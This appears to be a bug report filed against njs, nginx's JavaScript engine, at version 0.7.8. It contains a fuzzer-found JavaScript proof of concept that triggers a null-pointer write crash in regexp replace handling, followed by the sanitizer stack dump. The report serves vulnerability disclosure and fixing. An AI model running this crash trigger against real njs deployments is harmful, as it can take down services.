njs
njs copied to clipboard
nginx
SEGV njs_regexp.c:1397:28 in njs_regexp_prototype_symbol_replace
Environment
Commit : https://github.com/nginx/njs/commit/95425b271ad27470ea39d6c91ca4a614690ab12b
Version : 0.7.8
Build : ./configure --cc=clang --address-sanitizer=YES
make
POC
function main() {
const v1 = [];
const v3 = {"get":Object};
const v6 = {"get":Object,"set":Object};
const v7 = Object.defineProperty(v1,413211585,v6);
const v9 = "number".__proto__;
const v10 = [];
const v11 = v10.join(v9);
const v12 = Object.defineProperty(v1,"6",v3);
const v13 = /\d?/myi;
function v15(v16,v17,v18,v19) {
return v1;
}
v13["exec"] = v15;
const v21 = "replace"["replace"](v13);
}
main();
Stack dump
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==3789694==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000473990 bp 0x7ffc1c8a6590 sp 0x7ffc1c8a6430 T3789694)
==3789694==The signal is caused by a WRITE memory access.
==3789694==Hint: address points to the zero page.
#0 0x473990 in njs_regexp_prototype_symbol_replace /home/user/fuzzilli_njs/njs/njs/src/njs_regexp.c:1397:28
#1 0x46e734 in njs_function_native_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:747:11
#2 0x46db98 in njs_function_frame_invoke /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:793:16
#3 0x46db98 in njs_function_call2 /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:597:11
#4 0x45420e in njs_function_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.h:181:12
#5 0x45420e in njs_string_prototype_replace /home/user/fuzzilli_njs/njs/njs/src/njs_string.c:3729:20
#6 0x46e734 in njs_function_native_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:747:11
#7 0x46dc7f in njs_function_frame_invoke /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:793:16
#8 0x43a61e in njs_vmcode_interpreter /home/user/fuzzilli_njs/njs/njs/src/njs_vmcode.c:854:23
#9 0x46e221 in njs_function_lambda_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:698:11
#10 0x46dcb0 in njs_function_frame_invoke /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:796:16
#11 0x43a61e in njs_vmcode_interpreter /home/user/fuzzilli_njs/njs/njs/src/njs_vmcode.c:854:23
#12 0x437917 in njs_vm_start /home/user/fuzzilli_njs/njs/njs/src/njs_vm.c:544:11
#13 0x42ce32 in njs_process_script /home/user/fuzzilli_njs/njs/njs/src/njs_shell.c:1070:19
#14 0x42d62c in njs_process_file /home/user/fuzzilli_njs/njs/njs/src/njs_shell.c:799:11
#15 0x42cabb in main /home/user/fuzzilli_njs/njs/njs/src/njs_shell.c:461:15
#16 0x7f1594b5b082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#17 0x406ded in _start (/home/user/fuzzilli_njs/njs/njs/build/njs+0x406ded)
UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV /home/user/fuzzilli_njs/njs/njs/src/njs_regexp.c:1397:28 in njs_regexp_prototype_symbol_replace
